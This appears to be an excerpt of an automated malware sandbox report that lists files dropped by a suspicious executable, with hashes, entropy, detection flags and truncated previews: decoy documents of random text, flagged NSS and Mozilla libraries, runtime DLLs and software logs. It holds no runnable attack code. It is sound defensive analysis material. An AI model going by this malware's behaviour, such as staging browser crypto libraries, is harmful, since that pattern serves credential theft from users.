                                                                                                                                                                                                                                                                                      SHA-256:C2279E62766B7EFD46442641AECB3D9A0A25CE999296AC5BA9DA7BF18B2BDA92
                                                                                                                                                                                                                                                                                      SHA-512:65EFD5B1E235EF6AD917EAF95E16E3287CA9720F3F0EE989667A1DBB651693580415182F64FFA7538986E2BE7F19AC030836DF62489BB49C42383F5FCD3FA5D2
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:NWCXBPIUYIVIMEKOECOAETPCBVGOLLFSFYSIEWGCQXXYDTHBXCBBHRPJYJIIAKLIVVLYHTWFXTIMRQKNXJVKYWJRGDPRAMVTWAMYMVUPBCODOHNWGVUTTMDRCGQSWUENMIVFDVUFWRBWWAXFGLJCWHJESVSORVMBBPZHMGNOLAZEBTVVZJSGFZDCEBOKEELVIKVUJUJMYXSQXAWBVPYELDJUPEKNZGLXBNUDAABLCYAZVPQYBYHWASQZIKCOZDJXTSUXLKTDHJGSYIZZEGRZZNKKDUJMXSRWEDSBIZWRCWGJILNJNQKYISXAGNMQIWLOTRVEMVUEFFBMOVSUOJIHGLPPIKHURRWPPLYGZVGPLTDDNFHWCGDYBJWXDCKVHBTKZNVCGFMGAYMEPNBBZNTBERBXWUZQOWOXLEBSIXOWEZFEHNZYOEPBPYERLPMITANPJUDWNRNURGGOVPAFPUMUFAJJGHCGGSHCPAKCRSPZJJODRADCRCMYZDUAIWBDBDCPBUYVIRSRMZFDRIJQLLRUECYTILJEKDTTKMJATFJZGEOYRXTQSNGOENKASOPKMGWIWBAOMVIDHMXGNZFQLDKEJHBNZOCNFNIXNHOKWJNDTYAWGDGLYPWBQMSVSXTAECOYAEULSBSJPKKFQWDJACOZKJGANAIJBUMCLKLMRCAXPGXPFJMMBITWGGANYVNUIAJQWHHSWFPPASKHZAUXVZCDBKOWYHZAGAZKRYAWMXNYMSOVNKLUSFMEKYZMJTXYMLLTDLXXHKEEHBYXXFBEBTALQHMYPVOGJLATHUICOJIIQJINSCWPMNRVRLYYRHLAJBLVHEDYTFSDAVKINLNNEEURYKXHNXJMZIQWVOJNOTKRUWHSVTMXWRNJWLJJHPIPSFMIAIWBMNDXXCXXZCPDOKGRINVUVYHCJLFDJIZCOEFTHTRHTIWRPLTKLXPUDEBCIHBMDJOHZRRRYIUNRRIECVWDGMFRWLRMKDBNVTLGPDQC

                                                                                                                                                                                                                                                                                      C:\ProgramData\NWCXBPIUYI.xlsx

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.696724055101702
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:amL3nXTtZkQxqip7hViX2Zka12//5V9PP+Iw5ZrfqoV2P8S7FpwmKxlTn:xXL4ivV62qaI/xVhVWZ+X8SxKDT
                                                                                                                                                                                                                                                                                      MD5:1FFF6A639C738561CDC01BD436BA77C1
                                                                                                                                                                                                                                                                                      SHA1:BAFB1D68D43B177330F701BA01CA1AD19CB4FBB8
                                                                                                                                                                                                                                                                                      SHA-256:C2279E62766B7EFD46442641AECB3D9A0A25CE999296AC5BA9DA7BF18B2BDA92
                                                                                                                                                                                                                                                                                      SHA-512:65EFD5B1E235EF6AD917EAF95E16E3287CA9720F3F0EE989667A1DBB651693580415182F64FFA7538986E2BE7F19AC030836DF62489BB49C42383F5FCD3FA5D2
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:NWCXBPIUYIVIMEKOECOAETPCBVGOLLFSFYSIEWGCQXXYDTHBXCBBHRPJYJIIAKLIVVLYHTWFXTIMRQKNXJVKYWJRGDPRAMVTWAMYMVUPBCODOHNWGVUTTMDRCGQSWUENMIVFDVUFWRBWWAXFGLJCWHJESVSORVMBBPZHMGNOLAZEBTVVZJSGFZDCEBOKEELVIKVUJUJMYXSQXAWBVPYELDJUPEKNZGLXBNUDAABLCYAZVPQYBYHWASQZIKCOZDJXTSUXLKTDHJGSYIZZEGRZZNKKDUJMXSRWEDSBIZWRCWGJILNJNQKYISXAGNMQIWLOTRVEMVUEFFBMOVSUOJIHGLPPIKHURRWPPLYGZVGPLTDDNFHWCGDYBJWXDCKVHBTKZNVCGFMGAYMEPNBBZNTBERBXWUZQOWOXLEBSIXOWEZFEHNZYOEPBPYERLPMITANPJUDWNRNURGGOVPAFPUMUFAJJGHCGGSHCPAKCRSPZJJODRADCRCMYZDUAIWBDBDCPBUYVIRSRMZFDRIJQLLRUECYTILJEKDTTKMJATFJZGEOYRXTQSNGOENKASOPKMGWIWBAOMVIDHMXGNZFQLDKEJHBNZOCNFNIXNHOKWJNDTYAWGDGLYPWBQMSVSXTAECOYAEULSBSJPKKFQWDJACOZKJGANAIJBUMCLKLMRCAXPGXPFJMMBITWGGANYVNUIAJQWHHSWFPPASKHZAUXVZCDBKOWYHZAGAZKRYAWMXNYMSOVNKLUSFMEKYZMJTXYMLLTDLXXHKEEHBYXXFBEBTALQHMYPVOGJLATHUICOJIIQJINSCWPMNRVRLYYRHLAJBLVHEDYTFSDAVKINLNNEEURYKXHNXJMZIQWVOJNOTKRUWHSVTMXWRNJWLJJHPIPSFMIAIWBMNDXXCXXZCPDOKGRINVUVYHCJLFDJIZCOEFTHTRHTIWRPLTKLXPUDEBCIHBMDJOHZRRRYIUNRRIECVWDGMFRWLRMKDBNVTLGPDQC

                                                                                                                                                                                                                                                                                      C:\ProgramData\WSHEJMDVQC.docx

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.694142261581685
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
                                                                                                                                                                                                                                                                                      MD5:E9AA17F314E072EBB015265FB63E77C0
                                                                                                                                                                                                                                                                                      SHA1:1233B76350B8181FFFC438B62002C02B4AE79000
                                                                                                                                                                                                                                                                                      SHA-256:F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
                                                                                                                                                                                                                                                                                      SHA-512:719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:WSHEJMDVQCWJPIIWMEHEPOBRYLOZOHFMDEEYYASRZPHJZGFNCKWIQSPBUMWBCKDMTEBFINALYAFGJUQXINNGDKSDBFBQLHYZRLLDJYSVNXVIEPIYHZGOTARYUNPFNZVRVVWIOWWFIFWCHVVHXNGKFNRNLVVSOPOMGZCDQUWJFARKTCAVVDPTCPNIDLRGSLNKZTVRAJAILYGDVIAAGIVKXRCRTRZJPKATKZAWRJTPVLTDNBDIRDWCCHBTEVEGYPYDTGSMLUDQXMQCAVHLYMRKPCVHQHMGNCGBZKOUKCCBHQPSIYIJGDVOYJJJRQLDKNVUEXDKCTANSMCHJUBIODALXWUAFPSECIRPCAEPPBACCLXBZAEDKJHLGOICLSKBQEGFCVDQOFKKAJPCTRIXBNPUDXKHSSXTDTQZSFEWHTHKFNJWHOEXGCYSYWIHFSMYJIYEESDQFMESLFQFBUJNXHWFNXIDWEUDMVGFDXPTRRRNPARVUGZAYZRHNTXHZAPBLWMHFSSHMXCYMAGONQNLTCAVPZPCAKJRMGEPDIFETDNSXWPDVMAZGTTCLNRREMVTBLOGKASYOATUDXLJKIYPPDNLZIZMWWFFDVMUFCTZZOFJORNAMGQBAFGCPTDCZBKTIGYDSCSPMIEXAMGICZNTFVNRPLGPMBXJHNCQSYNMGGPKIQJNDBDUBVIVXFILKXZXHODXZAYIDEIMZZMKQNQNBCCMZNFBKSYULDGKOMQZDUQMUVTBBTUTRZMIOZGDEUPHCDKJQDSGBXYNWPWTHYVLGGYNOBJJKAZSTKJSBCHVCLGWYHCNILYSCYCHTGYOGMNGWDZAVDCOVKWJPWVNTTKFTSHAAXLYUEWEVGETFCFTLKWTQCVAMBWYOYJVXNPSSWXJXUZDXJOZNTBLIZLLJQXYNILILMHHONBPAPFMVWEMHIHAGMOXTIBNNEBGCVSZEZTMJVDXSVACSKTAVTFOOSEHZQGTOUSCIQBVIWZGABQNZGJE

                                                                                                                                                                                                                                                                                      C:\ProgramData\freebl3.dll

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):685392
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                                      MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                                      SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                                      SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                                      SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                                                                      • Filename: q27UFusYdn.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: ipR98bCqps.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: 5SLBlv4aUS.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: XAcuSo8KDa.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: WF2R8Bsptu.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: 5F25UVdGxt.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: f0FSseHktD.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: wipOhNpHIG.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: 8OeyVwIM3t.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: f6pwu0HWXe.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\iolo technologies\logs\bootstrap.log

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):331
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.151975416221736
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:BMKLFyznZtaAgrCYqyznOmLIYvgBtXWOyznLRHB1JCHyz6I0XY4eA:fobaXCYzqmkYvgLXWXXT/Bm73
                                                                                                                                                                                                                                                                                      MD5:89E0241E653AD9089917D2BAAB49071C
                                                                                                                                                                                                                                                                                      SHA1:9622CBDBB310705F0E497E83321053B1387F8127
                                                                                                                                                                                                                                                                                      SHA-256:8FD18751D0F74EE085916699734B139F5C6C2A4D2EA3D37F02A4CE1D00B0D560
                                                                                                                                                                                                                                                                                      SHA-512:FED504575A67142746E2AECBF0EE6DC0EFFF77E09B0944EC09B546FBDA572BFD53C3C74C7C63C25E2A902779EFB23DF69CD213840E48499C2B19D761A29CF3A7
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:Bootstrap LogFile..-----------------..[23/04/2024 09:29:00]: Product System Mechanic Determined From 5488CB36-BE62-4606-B07B-2EE938868BD1..[23/04/2024 09:29:00]: This Brand IOLODEFAULT Not Detected As Installed..[23/04/2024 09:29:00]: No Supported Products Were Detected On This System..[23/04/2024 09:30:02]: Telemetry Data Sent..

                                                                                                                                                                                                                                                                                      C:\ProgramData\iolo\logs\WSComm.log

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.1.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):346
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.206777952048686
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:qJUIF0TCfk3VotGjZb34LJYsWziQilo54Q0TCfk3VotGjZb34L9VE/Qiloe:TI6TXVotgOLf0rik47TXVotgOL9Vrit
                                                                                                                                                                                                                                                                                      MD5:EF73FFC66D50A8B54CA8129C2A6214B3
                                                                                                                                                                                                                                                                                      SHA1:2DC5776DD4682BF2F7DD74A18CFFF9455EE30EAC
                                                                                                                                                                                                                                                                                      SHA-256:EBFAB6655CF88E965A8E77C21D83B5730BF8E8CB0C7109D61C9715396914A107
                                                                                                                                                                                                                                                                                      SHA-512:5A977C616E758A9EFC1762F248B0BDD05B5C5BA00C4072D103111921C8ECD6D9AF17448FEFF837E617C2BF46513B2BCCFE232DC4AD8F9AA4AD947E3C7F35D333
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:[04/23/24 09:28:21] PerformGetOrPost : Attempting a POST on http://svc.iolo.com/__svc/sbv/DownloadManager.ashx...[04/23/24 09:28:22] IsValidCommunication : Result := True...[04/23/24 09:28:38] PerformGetOrPost : Attempting a POST on http://svc.iolo.com/__svc/sbv/DownloadManager.ashx...[04/23/24 09:28:38] IsValidCommunication : Result := True...

                                                                                                                                                                                                                                                                                      C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):608080
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                                      MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                                      SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                                      SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                                      SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                                                                      • Filename: q27UFusYdn.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: ipR98bCqps.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: 5SLBlv4aUS.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: XAcuSo8KDa.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: WF2R8Bsptu.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: 5F25UVdGxt.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: f0FSseHktD.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: wipOhNpHIG.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: 8OeyVwIM3t.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: f6pwu0HWXe.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\msvcp140.dll

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):450024
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                                                      MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                                                      SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                                                      SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                                                      SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                                                                      • Filename: q27UFusYdn.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: ipR98bCqps.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: 5SLBlv4aUS.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: XAcuSo8KDa.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: WF2R8Bsptu.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: 5F25UVdGxt.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: f0FSseHktD.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: wipOhNpHIG.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: 8OeyVwIM3t.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: f6pwu0HWXe.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\nss3.dll

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2046288
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                                                      MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                                                      SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                                                      SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                                                      SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\softokn3.dll

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):257872
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                                                      MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                                                      SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                                                      SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                                                      SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\vcruntime140.dll

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):80880
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                                      MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                                      SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                                      SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                                      SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\ApplicationInsights\5031d305a611656da7ab8203ae6a6b12e704f90cc3b1d89a8de243f466cad47b\433xbfbj.3vv

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3::
                                                                                                                                                                                                                                                                                      MD5:93B885ADFE0DA089CDF634904FD59F71
                                                                                                                                                                                                                                                                                      SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                                                                                                                                                                                                                                                                                      SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                                                                                                                                                                                                                                                                                      SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):685392
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                                      MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                                      SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                                      SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                                      SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                                      Malicious:true
